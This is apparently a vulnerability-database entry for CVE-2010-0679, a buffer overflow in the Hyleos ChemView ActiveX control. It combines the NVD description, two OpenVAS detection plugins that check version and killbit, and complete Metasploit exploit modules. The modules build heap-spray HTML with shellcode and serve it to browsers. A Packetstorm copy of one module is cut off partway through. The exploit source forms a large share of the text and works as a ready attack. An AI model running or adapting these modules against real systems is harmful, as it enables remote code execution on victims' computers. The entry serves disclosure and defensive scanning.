ID CVE-2010-0679 Type cve Reporter NVD Modified 2010-02-23T00:00:00
Description
Multiple stack-based buffer overflows in the HyleosChemView.HLChemView ActiveX control (HyleosChemView.ocx) in Hyleos ChemView 1.9.5.1 allow remote attackers to execute arbitrary code via a large number of white space characters in the filename argument to the (1) SaveasMolFile and (2) ReadMolFile methods.
{"modified": "2010-02-23T00:00:00", "id": "CVE-2010-0679", "edition": 1, "objectVersion": "1.2", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0679", "cvelist": ["CVE-2010-0679"], "references": ["http://www.securityfocus.com/bid/38225", "http://packetstormsecurity.org/1002-exploits/hyleoschemview-heap.rb.txt", "http://www.exploit-db.com/exploits/11422", "http://packetstormsecurity.org/1002-advisories/chemviewx-overflow.txt", "http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf"], "bulletinFamily": "NVD", "lastseen": "2016-09-03T13:33:58", "title": "CVE-2010-0679", "published": "2010-02-22T16:30:00", "viewCount": 0, "type": "cve", "cpe": ["cpe:/a:hyleos:chemview:1.9.5.1"], "description": "Multiple stack-based buffer overflows in the HyleosChemView.HLChemView ActiveX control (HyleosChemView.ocx) in Hyleos ChemView 1.9.5.1 allow remote attackers to execute arbitrary code via a large number of white space characters in the filename argument to the (1) SaveasMolFile and (2) ReadMolFile methods.", "hash": "bf15923e48a1ab825b7f82c58e4c5d428810507157929e60d9fb9b8f495c2e86", "reporter": "NVD", "scanner": [], "assessment": {"system": "", "name": "", "href": ""}, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2016-09-03T13:33:58"}, "vulnersScore": 7.5}}
{"exploitdb": [{"lastseen": "2016-02-01T14:16:48", "osvdbidlist": ["62276"], "references": [], "edition": 1, "description": "Hyleos ChemView v1.9.5.1 ActiveX Control Buffer Overflow Exploit (meta). CVE-2010-0679. Remote exploit for windows platform", "reporter": "Dz_attacker", "published": "2010-02-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "exploitdb", "title": "Hyleos ChemView 1.9.5.1 - ActiveX Control Buffer Overflow Exploit meta", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0679"], "modified": "2010-02-12T00:00:00", "id": "EDB-ID:11422", "href": "https://www.exploit-db.com/exploits/11422/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Hyleos ChemView ActiveX Control Buffer Overflow Exploit',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack-based buffer overflow within HyleosChemView.ocx of Hyleos ChemView 1.9.5.1\r\n\t\t\t\tBy setting an overly long value to 'SaveAsMolFile()', an attacker can overrun a buffer\r\n\t\t\t\tand execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Dz_attacker <dz_attacker[at]hotmail.fr>'\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'URL', 'http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0a\\x20\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0A0A0a0A, 'Offset' => 150 } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 11 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# Encode the shellcode\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Setup exploit buffers\r\n\t\tnops \t = Rex::Text.to_unescape([target.ret].pack('V'))\r\n\t\tret \t = Rex::Text.uri_encode([target.ret].pack('L'))\r\n\t\tblocksize = 0x40000\r\n\t\tfillto = 300\r\n\t\toffset \t = target['Offset']\r\n\r\n\t\t# Randomize the javascript variable names\r\n\t\tchemview = rand_text_alpha(rand(100) + 1)\r\n\t\tj_shellcode = rand_text_alpha(rand(100) + 1)\r\n\t\tj_nops = rand_text_alpha(rand(100) + 1)\r\n\t\tj_ret = rand_text_alpha(rand(100) + 1)\r\n\t\tj_headersize = rand_text_alpha(rand(100) + 1)\r\n\t\tj_slackspace = rand_text_alpha(rand(100) + 1)\r\n\t\tj_fillblock = rand_text_alpha(rand(100) + 1)\r\n\t\tj_block = rand_text_alpha(rand(100) + 1)\r\n\t\tj_memory = rand_text_alpha(rand(100) + 1)\r\n\t\tj_counter = rand_text_alpha(rand(30) + 2)\r\n\r\n\r\n\t\thtml = %Q|<html>\r\n<object classid='clsid:C372350A-1D5A-44DC-A759-767FC553D96C' id='#{chemview}'></object>\r\n<script>\r\n#{j_shellcode}=unescape('#{shellcode}');\r\n#{j_nops}=unescape('#{nops}');\r\n#{j_headersize}=20;\r\n#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;\r\nwhile(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};\r\n#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});\r\n#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});\r\nwhile(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};\r\n#{j_memory}=new Array();\r\nfor(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};\r\n\r\nvar #{j_ret}='';\r\nfor(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');\r\n#{chemview}.SaveAsMolFile(#{j_ret});\r\n</script>\r\n</html>|\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\r\n\t\tfile_create(html)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/11422/"}, {"lastseen": "2016-02-02T00:00:30", "osvdbidlist": ["62276"], "references": [], "edition": 1, "description": "Hyleos ChemView ActiveX Control Stack Buffer Overflow. CVE-2010-0679. Remote exploit for windows platform", "reporter": "metasploit", "published": "2010-07-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Hyleos ChemView ActiveX Control Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0679"], "modified": "2010-07-27T00:00:00", "id": "EDB-ID:16500", "href": "https://www.exploit-db.com/exploits/16500/", "sourceData": "##\r\n# $Id: hyleos_chemviewx_activex.rb 9935 2010-07-27 02:25:15Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking # heap spray :-/\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Hyleos ChemView ActiveX Control Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos\r\n\t\t\t\tChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods\r\n\t\t\t\twith an overly long first argument, an attacker can overrun a buffer and execute\r\n\t\t\t\tarbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Paul Craig <paul.craig[at]security-assessment.com>', # original discovery/advisory\r\n\t\t\t\t\t'Dz_attacker <dz_attacker[at]hotmail.fr>', # original file format module\r\n\t\t\t\t\t'jduck' # converted HttpServer module\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 9935 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-0679' ],\r\n\t\t\t\t\t[ 'OSVDB', '62276' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/11422/' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0A0A0a0A, 'Offset' => 150 } ]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 10 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tclsid = \"C372350A-1D5A-44DC-A759-767FC553D96C\"\r\n\t\tprogid = \"HyleosChemView.HLChemView\"\r\n\r\n\t\tmethods = [ \"ReadMolFile\", \"SaveAsMolFile\" ]\r\n\t\tmethod = methods[rand(methods.length)]\r\n\t\tmethod = \"SaveAsMolFile\"\r\n\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# It may be possible to create a more robust exploit, however --\r\n\t\t# 1. The control's base address has been shown to vary (seen at 0x1c90000 and 0x1d90000)\r\n\t\t# 2. The buffer overflow does not appear to be entirely straight forward.\r\n\r\n\t\t# Encode the shellcode\r\n\t\tshellcode = Rex::Text.to_unescape(p.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Setup exploit buffers\r\n\t\tnops \t = Rex::Text.to_unescape([target.ret].pack('V'))\r\n\t\tret \t = Rex::Text.uri_encode([target.ret].pack('L'))\r\n\t\tblocksize = 0x40000\r\n\t\tfillto = 300\r\n\t\toffset \t = target['Offset']\r\n\r\n\t\t# Randomize the javascript variable names\r\n\t\tchemview = rand_text_alpha(rand(100) + 1)\r\n\t\tj_shellcode = rand_text_alpha(rand(100) + 1)\r\n\t\tj_nops = rand_text_alpha(rand(100) + 1)\r\n\t\tj_ret = rand_text_alpha(rand(100) + 1)\r\n\t\tj_headersize = rand_text_alpha(rand(100) + 1)\r\n\t\tj_slackspace = rand_text_alpha(rand(100) + 1)\r\n\t\tj_fillblock = rand_text_alpha(rand(100) + 1)\r\n\t\tj_block = rand_text_alpha(rand(100) + 1)\r\n\t\tj_memory = rand_text_alpha(rand(100) + 1)\r\n\t\tj_counter = rand_text_alpha(rand(30) + 2)\r\n\r\n\t\tcontent = %Q|<html>\r\n<object classid='clsid:#{clsid}' id='#{chemview}'></object>\r\n<script>\r\n#{j_shellcode}=unescape('#{shellcode}');\r\n#{j_nops}=unescape('#{nops}');\r\n#{j_headersize}=20;\r\n#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;\r\nwhile(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};\r\n#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});\r\n#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});\r\nwhile(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};\r\n#{j_memory}=new Array();\r\nfor(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};\r\n\r\nvar #{j_ret}='';\r\nfor(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');\r\n#{chemview}.#{method}(#{j_ret});\r\n</script>\r\n</html>|\r\n\r\n\r\n\t\tprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16500/"}], "openvas": [{"lastseen": "2017-07-20T08:49:14", "references": ["http://packetstormsecurity.org/1002-exploits/hyleoschemview-heap.rb.txt", "http://www.exploit-db.com/exploits/11422", "http://secunia.com/advisories/38523", "http://packetstormsecurity.org/1002-advisories/chemviewx-overflow.txt"], "pluginID": "900749", "description": "This host is installed with Hyleos ChemView ActiveX Control and is\n prone to multiple Buffer Overflow vulnerabilities.", "edition": 2, "reporter": "Copyright (C) 2010 SecPod", "published": "2010-03-02T00:00:00", "title": "Hyleos ChemView ActiveX Control Multiple Buffer Overflow Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Buffer overflow", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0679"], "modified": "2017-07-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=900749", "id": "OPENVAS:900749", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_hyleos_chemview_activex_mult_bof_vuln.nasl 6532 2017-07-05 07:42:05Z cfischer $\n#\n# Hyleos ChemView ActiveX Control Multiple Buffer Overflow Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Hyleos ChemView ActiveX Control version 1.9.5.1 and prior.\";\ntag_impact = \"Successful exploitation could allow an attacker to execute arbitrary code\nwithin the context of the affected application.\n\nImpact Level: Application\";\ntag_insight = \"The flaws are due to two boundary errors in the 'HyleosChemView.ocx'\nwhich can be exploited to cause stack-based buffer overflows by passing\nstrings containing an overly large number of white-space characters to the\n'SaveasMolFile()' and 'ReadMolFile()' methods.\";\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\n\nA Workaround is to set the Killbit for the vulnerable CLSID\n{C372350A-1D5A-44DC-A759-767FC553D96C}\";\ntag_summary = \"This host is installed with Hyleos ChemView ActiveX Control and is\n prone to multiple Buffer Overflow vulnerabilities.\";\n\nif(description)\n{\n script_id(900749);\n script_version(\"$Revision: 6532 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 09:42:05 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 12:02:59 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-0679\");\n script_bugtraq_id(38225);\n script_name(\"Hyleos ChemView ActiveX Control Multiple Buffer Overflow Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/38523\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/11422\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.org/1002-advisories/chemviewx-overflow.txt\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.org/1002-exploits/hyleoschemview-heap.rb.txt\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_hyleos_chemview_detect.nasl\");\n script_mandatory_keys(\"Hyleos/ChemViewX/Ver\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nchemVer = get_kb_item(\"Hyleos/ChemViewX/Ver\");\nif(!chemVer){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nif(!version_is_less_equal(version:chemVer, test_version:\"1.9.5.1\")){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n name = registry_get_sz(key:key + item, item:\"DisplayName\");\n if(\"Hyleos - ChemViewX\" >< name)\n {\n chemPath = registry_get_sz(key:key + item, item:\"InstallLocation\");\n dllPath = chemPath + \"\\Common\\HyleosChemView.ocx\";\n\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:dllPath);\n\n dllVer = GetVer(file:file, share:share);\n if(dllVer != NULL)\n {\n # Grep for HyleosChemView.ocx version 1.9.5.1 and prior\n if(version_is_less_equal(version:dllVer, test_version:\"1.9.5.1\"))\n {\n # Workaround check\n if(is_killbit_set(clsid:\"{C372350A-1D5A-44DC-A759-767FC553D96C}\") == 0){\n security_message(0);\n }\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:05:12", "references": ["http://packetstormsecurity.org/1002-exploits/hyleoschemview-heap.rb.txt", "http://www.exploit-db.com/exploits/11422", "http://secunia.com/advisories/38523", "http://packetstormsecurity.org/1002-advisories/chemviewx-overflow.txt"], "pluginID": "1361412562310900749", "description": "This host is installed with Hyleos ChemView ActiveX Control and is\n prone to multiple Buffer Overflow vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2010 SecPod", "published": "2010-03-02T00:00:00", "title": "Hyleos ChemView ActiveX Control Multiple Buffer Overflow Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Buffer overflow", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0679"], "modified": "2018-01-19T00:00:00", "id": "OPENVAS:1361412562310900749", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900749", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_hyleos_chemview_activex_mult_bof_vuln.nasl 8469 2018-01-19 07:58:21Z teissa $\n#\n# Hyleos ChemView ActiveX Control Multiple Buffer Overflow Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"Hyleos ChemView ActiveX Control version 1.9.5.1 and prior.\";\ntag_impact = \"Successful exploitation could allow an attacker to execute arbitrary code\nwithin the context of the affected application.\n\nImpact Level: Application\";\ntag_insight = \"The flaws are due to two boundary errors in the 'HyleosChemView.ocx'\nwhich can be exploited to cause stack-based buffer overflows by passing\nstrings containing an overly large number of white-space characters to the\n'SaveasMolFile()' and 'ReadMolFile()' methods.\";\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\n\nA Workaround is to set the Killbit for the vulnerable CLSID\n{C372350A-1D5A-44DC-A759-767FC553D96C}\";\ntag_summary = \"This host is installed with Hyleos ChemView ActiveX Control and is\n prone to multiple Buffer Overflow vulnerabilities.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900749\");\n script_version(\"$Revision: 8469 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 08:58:21 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 12:02:59 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-0679\");\n script_bugtraq_id(38225);\n script_name(\"Hyleos ChemView ActiveX Control Multiple Buffer Overflow Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/38523\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/11422\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.org/1002-advisories/chemviewx-overflow.txt\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.org/1002-exploits/hyleoschemview-heap.rb.txt\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_hyleos_chemview_detect.nasl\");\n script_mandatory_keys(\"Hyleos/ChemViewX/Ver\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\nchemVer = get_kb_item(\"Hyleos/ChemViewX/Ver\");\nif(!chemVer){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nif(!version_is_less_equal(version:chemVer, test_version:\"1.9.5.1\")){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n name = registry_get_sz(key:key + item, item:\"DisplayName\");\n if(\"Hyleos - ChemViewX\" >< name)\n {\n chemPath = registry_get_sz(key:key + item, item:\"InstallLocation\");\n dllPath = chemPath + \"\\Common\\HyleosChemView.ocx\";\n\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:dllPath);\n\n dllVer = GetVer(file:file, share:share);\n if(dllVer != NULL)\n {\n # Grep for HyleosChemView.ocx version 1.9.5.1 and prior\n if(version_is_less_equal(version:dllVer, test_version:\"1.9.5.1\"))\n {\n # Workaround check\n if(is_killbit_set(clsid:\"{C372350A-1D5A-44DC-A759-767FC553D96C}\") == 0){\n security_message(0);\n }\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:27", "references": [], "edition": 1, "description": "", "reporter": "Paul Craig", "published": "2010-07-27T00:00:00", "type": "packetstorm", "title": "Hyleos ChemView ActiveX Control Stack Buffer Overflow", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0679"], "modified": "2010-07-27T00:00:00", "href": "https://packetstormsecurity.com/files/92197/Hyleos-ChemView-ActiveX-Control-Stack-Buffer-Overflow.html", "id": "PACKETSTORM:92197", "sourceData": "`## \n# $Id: hyleos_chemviewx_activex.rb 9935 2010-07-27 02:25:15Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking # heap spray :-/ \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Hyleos ChemView ActiveX Control Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos \nChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods \nwith an overly long first argument, an attacker can overrun a buffer and execute \narbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Paul Craig <paul.craig[at]security-assessment.com>', # original discovery/advisory \n'Dz_attacker <dz_attacker[at]hotmail.fr>', # original file format module \n'jduck' # converted HttpServer module \n], \n'Version' => '$Revision: 9935 $', \n'References' => \n[ \n[ 'CVE', '2010-0679' ], \n[ 'OSVDB', '62276' ], \n[ 'URL', 'http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/11422/' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0A0A0a0A, 'Offset' => 150 } ] \n], \n'DisclosureDate' => 'Feb 10 2010', \n'DefaultTarget' => 0)) \nend \n \ndef autofilter \nfalse \nend \n \ndef check_dependencies \nuse_zlib \nend \n \ndef on_request_uri(cli, request) \n \nclsid = \"C372350A-1D5A-44DC-A759-767FC553D96C\" \nprogid = \"HyleosChemView.HLChemView\" \n \nmethods = [ \"ReadMolFile\", \"SaveAsMolFile\" ] \nmethod = methods[rand(methods.length)] \nmethod = \"SaveAsMolFile\" \n \n# Re-generate the payload \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# It may be possible to create a more robust exploit, however -- \n# 1. The control's base address has been shown to vary (seen at 0x1c90000 and 0x1d90000) \n# 2. The buffer overflow does not appear to be entirely straight forward. \n \n# Encode the shellcode \nshellcode = Rex::Text.to_unescape(p.encoded, Rex::Arch.endian(target.arch)) \n \n# Setup exploit buffers \nnops = Rex::Text.to_unescape([target.ret].pack('V')) \nret = Rex::Text.uri_encode([target.ret].pack('L')) \nblocksize = 0x40000 \nfillto = 300 \noffset = target['Offset'] \n \n# Randomize the javascript variable names \nchemview = rand_text_alpha(rand(100) + 1) \nj_shellcode = 